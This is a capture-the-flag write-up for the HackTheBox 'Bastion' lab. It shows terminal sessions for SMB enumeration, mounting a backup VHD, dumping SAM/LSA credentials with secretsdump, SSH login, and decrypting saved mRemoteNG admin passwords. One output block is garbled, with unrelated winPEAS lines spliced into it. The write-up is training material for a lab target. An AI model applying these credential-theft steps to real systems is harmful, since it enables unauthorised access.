bastion
Introduction:
Recon
1eneloop@kinetic:.../hackthebox/bastion/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.bastion.txt 10.10.10.134
2[sudo] password for eneloop:
3Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 20:57 EDT
4Nmap scan report for 10.10.10.134
5Host is up (0.086s latency).
6Not shown: 996 closed ports
7PORT STATE SERVICE VERSION
822/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
9| ssh-hostkey:
10| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
11| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
12|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
13135/tcp open msrpc Microsoft Windows RPC
14139/tcp open netbios-ssn Microsoft Windows netbios-ssn
15445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
16Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
17No exact OS matches for host (test conditions non-ideal).
18Network Distance: 2 hops
19Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
20
21Host script results:
22|_clock-skew: mean: -36m10s, deviation: 1h09m14s, median: 3m47s
23| smb-os-discovery:
24| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
25| Computer name: Bastion
26| NetBIOS computer name: BASTION\x00
27| Workgroup: WORKGROUP\x00
28|_ System time: 2021-04-16T03:01:20+02:00
29| smb-security-mode:
30| account_used: guest
31| authentication_level: user
32| challenge_response: supported
33|_ message_signing: disabled (dangerous, but default)
34| smb2-security-mode:
35| 2.02:
36|_ Message signing enabled but not required
37| smb2-time:
38| date: 2021-04-16T01:01:21
39|_ start_date: 2021-04-16T00:58:25
40
41OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
42Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds
43
Enumerate the SMB
1eneloop@kinetic:.../hackthebox/bastion/data$ smbmap -u guest -H 10.10.10.134
2[+] IP: 10.10.10.134:445 Name: 10.10.10.134
3[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\OGRXPGEWYQ, please remove manually
4 Disk Permissions Comment
5 ---- ----------- -------
6 ADMIN$ NO ACCESS Remote Admin
7 Backups READ, WRITE
8 C$ NO ACCESS Default share
9 IPC$ READ ONLY Remote IPC
10eneloop@kinetic:.../hackthebox/bastion/data$ smbclient //10.10.10.134/Backups
11Enter WORKGROUP\eneloop's password:
12Try "help" to get a list of possible commands.
13smb: \> dir
14 . D 0 Thu Apr 15 21:06:00 2021
15 .. D 0 Thu Apr 15 21:06:00 2021
16 note.txt AR 116 Tue Apr 16 06:10:09 2019
17 OGRXPGEWYQ D 0 Thu Apr 15 21:06:00 2021
18 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
19 WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
20
21 7735807 blocks of size 4096. 2747370 blocks available
22smb: \> mget *
23Get file note.txt? y
24getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
25Get file SDT65CB.tmp? y
26getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.2 KiloBytes/sec)
27
Enumeration
Looks like we have a bunch of vhd files which is a windows backup of machine “L4mpje-PC” which seems like a windows computer of a user.
1smb: \> cd WindowsImageBackup
2smb: \WindowsImageBackup\> ls
3 . Dn 0 Fri Feb 22 07:44:02 2019
4 .. Dn 0 Fri Feb 22 07:44:02 2019
5 L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
6
7 7735807 blocks of size 4096. 2738317 blocks available
8smb: \WindowsImageBackup\> cd L4mpje-PC
9smb: \WindowsImageBackup\L4mpje-PC\> ls
10 . Dn 0 Fri Feb 22 07:45:32 2019
11 .. Dn 0 Fri Feb 22 07:45:32 2019
12 Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
13 Catalog Dn 0 Fri Feb 22 07:45:32 2019
14 MediaId An 16 Fri Feb 22 07:44:02 2019
15 SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
16
17 7735807 blocks of size 4096. 2738180 blocks available
18smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351
19cd \WindowsImageBackup\L4mpje-PC\Backup\: NT_STATUS_OBJECT_NAME_NOT_FOUND
20smb: \WindowsImageBackup\L4mpje-PC\>
21smb: \WindowsImageBackup\L4mpje-PC\>
22smb: \WindowsImageBackup\L4mpje-PC\> pwd
23Current directory is \\10.10.10.134\Backups\WindowsImageBackup\L4mpje-PC\
24smb: \WindowsImageBackup\L4mpje-PC\> dir
25 . Dn 0 Fri Feb 22 07:45:32 2019
26 .. Dn 0 Fri Feb 22 07:45:32 2019
27 Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
28 Catalog Dn 0 Fri Feb 22 07:45:32 2019
29 MediaId An 16 Fri Feb 22 07:44:02 2019
30 SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
31
32 7735807 blocks of size 4096. 2763199 blocks available
33smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
34smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
35 . Dn 0 Fri Feb 22 07:45:32 2019
36 .. Dn 0 Fri Feb 22 07:45:32 2019
37 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
38 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
39 BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
40 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
41 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
42 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
43 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
44 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
45 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
46 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
47 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
48 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
49 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
50
51 7735807 blocks of size 4096. 2763199 blocks available
52
We need to make sure that we have installed cifs-utils so that we can remotely mount the image files.
1eneloop@kinetic:.../hackthebox/bastion/data$ sudo apt-get install cifs-utils
2[sudo] password for eneloop:
3Reading package lists... Done
4Building dependency tree
5Reading state information... Done
6cifs-utils is already the newest version (2:6.11-1).
7The following package was automatically installed and is no longer required:
8 libboost-thread1.74.0
9Use 'sudo apt autoremove' to remove it.
100 upgraded, 0 newly installed, 0 to remove and 955 not upgraded.
11eneloop@kinetic:.../hackthebox/bastion/data$
12
1eneloop@kinetic:.../hackthebox/bastion/data$ sudo mount -t cifs //10.10.10.134/Backups/ /oscp/LABs/zerotrust/content/lab/hackthebox/bastion/data/L4mpje-PC -o rw
2🔐 Password for root@//10.10.10.134/Backups/: **********
3eneloop@kinetic:.../hackthebox/bastion/data$ cd L4mpje-PC/
4eneloop@kinetic:.../bastion/data/L4mpje-PC$ ls
5note.txt OGRXPGEWYQ SDT65CB.tmp WindowsImageBackup
6
1eneloop@kinetic:~$ cd Downloads
2eneloop@kinetic:~/Downloads$ mkdir L4mpje-PC-vhd
3eneloop@kinetic:~/Downloads$ pwd
4/home/eneloop/Downloads
5eneloop@kinetic:~/Downloads$ guestmount --add /oscp/LABs/zerotrust/content/lab/hackthebox/bastion/data/L4mpje-PC/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/eneloop/Downloads/L4mpje-PC-vhd
6eneloop@kinetic:~/Downloads$ cd L4mpje-PC-vhd
7eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ ls
8'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows
9eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$
Exploitation
Windows LFI - Interesting Files
Since we have a windows machine backup at our hands, lets find out any interesting files that may lead us to the access on this machine.
Here are some online blogs that list out important files that may contain sensitive information -
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/ https://raw.githubusercontent.com/soffensive/windowsblindread/master/windows-files.txt [Very comprehensive list] https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt [probably the same file as above]
1eneloop@kinetic:.../hackthebox/bastion/data$ cd /home/eneloop/Downloads/L4mpje-PC-vhd
2eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ ls
3'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows
4eneloop@kinetic:~/Downloads/L4mpje-PC-vhd$ cd Windows/
5eneloop@kinetic:~/Downloads/L4mpje-PC-vhd/Windows$ ls
6 addins Branding 'Downloaded Program Files' Globalization LiveKernelReports notepad.exe Prefetch security SoftwareDistribution Tasks twunk_16.exe winhlp32.exe
7 AppCompat CSC DtcInstall.log Help Logs 'Offline Web Pages' Professional.xml ServiceProfiles Speech Temp twunk_32.exe win.ini
8 AppPatch Cursors ehome HelpPane.exe Media Panther regedit.exe servicing Starter.xml tracing Vss winsxs
9 assembly debug en-US hh.exe mib.bin Performance Registration Setup system TSSysprep.log Web WMSysPr9.prx
10 bfsvc.exe _default.pif explorer.exe IME Microsoft.NET PFRO.log Resources setupact.log System32 twain_32 WindowsShell.Manifest write.exe
11 Boot diagnostics Fonts inf ModemLogs PLA SchCache setuperr.log system.ini twain_32.dll WindowsUpdate.log
12 bootstat.dat DigitalLocker fveupdate.exe L2Schemas msdfmap.ini PolicyDefinitions schemas ShellNew TAPI twain.dll winhelp.exe
13eneloop@kinetic:~/Downloads/L4mpje-PC-vhd/Windows$ cd System32
14
Dump all the credentials from SAM file
1eneloop@kinetic:~/.../Windows/System32/config$ pwd
2/home/eneloop/Downloads/L4mpje-PC-vhd/Windows/System32/config
3eneloop@kinetic:~/.../Windows/System32/config$ ls -l SAM
4-rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM
5eneloop@kinetic:~/.../Windows/System32/config$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
6Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
7
8[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
9[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
10Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
11Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
13[*] Dumping cached domain logon information (domain/username:hash)
14[*] Dumping LSA Secrets
15[*] DefaultPassword
16(Unknown User):bureaulampje
17[*] DPAPI_SYSTEM
18dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6l4mpje@BASTION C:\Users\L4mpje\Documents>dir
19 Volume in drive C has no label.
20 Volume Serial Number is 0CB3-C487
21
22 Directory of C:\Users\L4mpje\Documents
23
2418-04-2021 16:59 <DIR> .
2518-04-2021 16:59 <DIR> ..
2618-04-2021 16:59 35.107 winPEAS.bat
27 1 File(s) 35.107 bytes
28 2 Dir(s) 11.295.694.848 bytes free
29
30l4mpje@BASTION C:\Users\L4mpje\Documents>winPEAS.bat
31dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
32[*] Cleaning up...
33eneloop@kinetic:~/.../Windows/System32/config$
You have the default password as “bureaulampje”. You can also try cracking the nthashes using john or online tools.
SSH into the remote system
As you remember, the system also has port 22 open and we can try to SSH into this machine as user L4mpje with the password above.
1eneloop@kinetic:.../hackthebox/bastion/data$ ssh [email protected]
2The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
3ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
4Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
5Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
6[email protected]'s password:
7
8Microsoft Windows [Version 10.0.14393]
9(c) 2016 Microsoft Corporation. All rights reserved.
10
11l4mpje@BASTION C:\Users\L4mpje>
12
Post-exploit/PrivEsc
User flag
1l4mpje@BASTION C:\Users\L4mpje>cd Desktop
2
3l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
4 Volume in drive C has no label.
5 Volume Serial Number is 0CB3-C487
6
7 Directory of C:\Users\L4mpje\Desktop
8
922-02-2019 16:27 <DIR> .
1022-02-2019 16:27 <DIR> ..
1123-02-2019 10:07 32 user.txt
12 1 File(s) 32 bytes
13 2 Dir(s) 11.296.014.336 bytes free
14
15l4mpje@BASTION C:\Users\L4mpje\Desktop>
Root flag
Shipped and ran winPEAS.bat but it took very long and I ran out of patience.
1eneloop@kinetic:.../PEAS/winPEAS/winPEASbat$ scp winPEAS.bat [email protected]:'C:\Users\L4mpje\Documents\winPEAS.bat'
2[email protected]'s password:
3winPEAS.bat
1l4mpje@BASTION C:\Users\L4mpje\Documents>dir
2 Volume in drive C has no label.
3 Volume Serial Number is 0CB3-C487
4
5 Directory of C:\Users\L4mpje\Documents
6
718-04-2021 16:59 <DIR> .
818-04-2021 16:59 <DIR> ..
918-04-2021 16:59 35.107 winPEAS.bat
10 1 File(s) 35.107 bytes
11 2 Dir(s) 11.295.694.848 bytes free
12
13l4mpje@BASTION C:\Users\L4mpje\Documents>winPEAS.bat
While looking at installed programs under program files, I noticed mremoteNG. This a SSH connection manager and likely stores connection details and potentially saved passwords that can be extracted.
1l4mpje@BASTION C:\Program Files (x86)\mRemoteNG>cd C:\Users\%USER%\AppData\Roaming\mRemoteNG\
2
3l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
4 Volume in drive C has no label.
5 Volume Serial Number is 0CB3-C487
6
7 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
8
922-02-2019 15:03 <DIR> .
1022-02-2019 15:03 <DIR> ..
1122-02-2019 15:03 6.316 confCons.xml
1222-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
1322-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
1422-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
1522-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
1622-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
1722-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
1822-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
1922-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
2022-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
2122-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
2222-02-2019 15:03 51 extApps.xml
2322-02-2019 15:03 5.217 mRemoteNG.log
2422-02-2019 15:03 2.245 pnlLayout.xml
2522-02-2019 15:01 <DIR> Themes
26 14 File(s) 76.577 bytes
27 3 Dir(s) 11.286.224.896 bytes free
28
29l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>
Lets look inside the config files .. we see the encrypted password.
1l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>pwd
2'pwd' is not recognized as an internal or external command,
3operable program or batch file.
4
5l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
6<?xml version="1.0" encoding="utf-8"?>
7<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
8M" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j22XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXW0
9oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
10 <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
11me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
12 Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
13eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo
14ut="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" Disp
15
While looking at exploits for this tool, you will come across tools to decrypt the passwords stored by this tool. Found the script below on github that seems clean enough to understand -
https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Run the script and pass the password string from the config file -
1eneloop@kinetic:.../hackthebox/bastion/data$ python3 ./mremoteng_decrypt.py -s aEWNFVXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXWWA10dQKiw==
2Password: thXLXXXXXXXL0ER2
3eneloop@kinetic:.../hackthebox/bastion/data$
4
Now we have the admin password on the machine, lets read the root flag -
1eneloop@kinetic:.../hackthebox/bastion/data$ ssh [email protected]
2[email protected]'s password:
3
4Microsoft Windows [Version 10.0.14393]
5(c) 2016 Microsoft Corporation. All rights reserved.
6
7administrator@BASTION C:\Users\Administrator>cd Desktop
8
9administrator@BASTION C:\Users\Administrator\Desktop>dir
10 Volume in drive C has no label.
11 Volume Serial Number is 0CB3-C487
12
13 Directory of C:\Users\Administrator\Desktop
14
1523-02-2019 10:40 <DIR> .
1623-02-2019 10:40 <DIR> ..
1723-02-2019 10:07 32 root.txt
18 1 File(s) 32 bytes
19 2 Dir(s) 11.285.741.568 bytes free
20
21administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
Notes: